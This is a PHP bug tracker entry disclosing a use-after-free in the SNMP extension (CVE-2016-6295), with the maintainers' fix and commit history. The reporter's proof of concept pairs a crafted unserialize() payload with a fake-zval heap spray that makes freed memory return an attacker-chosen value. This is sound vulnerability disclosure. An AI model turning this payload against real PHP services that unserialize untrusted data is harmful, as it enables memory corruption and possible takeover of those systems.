PHP :: Sec Bug #72479 :: Use After Free Vulnerability in SNMP with GC and unserialize()

Sec Bug #72479	Use After Free Vulnerability in SNMP with GC and unserialize()
Submitted:	2016-06-23 14:39 UTC	Modified:	2016-07-25 15:20 UTC
From:	taoguangchen at icloud dot com	Assigned:	stas (profile)
Status:	Closed	Package:	SNMP related
PHP Version:	5.5.37	OS:	*
Private report:	No	CVE-ID:	2016-6295

View Developer Edit

[2016-06-23 14:39 UTC] taoguangchen at icloud dot com

Description:
------------
Use After Free Vulnerability in SNMP with GC and unserialize()

This bug is similar to bug#72434:

PoC:
```
<?php

$arr = [1, [1, 2, 3, 4, 5], 3, 4, 5];
$poc = 'a:3:{i:1;N;i:2;O:4:"snmp":1:{s:11:"quick_print";'.serialize($arr).'}i:1;R:7;}';
$out = unserialize($poc);
gc_collect_cycles();
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";
for ($i = 0; $i < 5; $i++) {
    $v[$i] = $fakezval.$i;
}
var_dump($out[1]);

function ptr2str($ptr)
{
    $out = '';
    for ($i = 0; $i < 8; $i++) {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}

?>
```

Expected result:
```
int(1)
```

Actual result:
```
int(1122334455)
```

Fix:
```
}
/* }}} */

+static HashTable *php_snmp_get_gc(zval *object, zval ***gc_data, int *gc_data_count TSRMLS_DC) /* {{{ */
+{
+	*gc_data = NULL;
+	*gc_data_count = 0;
+	return zend_std_get_properties(object TSRMLS_CC);
+}
+/* }}} */

/* {{{ php_snmp_get_properties(zval *object)
   Returns all object properties. Injects SNMP properties into object on first call */
static HashTable *php_snmp_get_properties(zval *object TSRMLS_DC)
{
...
	php_snmp_object_handlers.has_property = php_snmp_has_property;
+	php_snmp_object_handlers.get_gc = php_snmp_get_gc;
	php_snmp_object_handlers.get_properties = php_snmp_get_properties;
```

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2016-06-27 01:08 UTC] stas@php.net

-PHP Version: Irrelevant +PHP Version: 5.5.37 -Assigned To: +Assigned To: stas

[2016-06-27 01:08 UTC] stas@php.net

Added fix as cab1c3b3708eead315e033359d07049b23b147a3 and https://gist.github.com/035a95208257aed53e7221275d57a231

[2016-07-19 07:47 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434

[2016-07-19 07:47 UTC] stas@php.net

-Status: Assigned +Status: Closed

[2016-07-19 07:53 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434

[2016-07-19 08:39 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434

[2016-07-19 08:55 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434

[2016-07-25 15:20 UTC] remi@php.net

-CVE-ID: +CVE-ID: 2016-6295

[2016-10-17 10:11 UTC] bwoebi@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2025 The PHP Group All rights reserved.	Last updated: Thu Oct 30 22:00:01 2025 UTC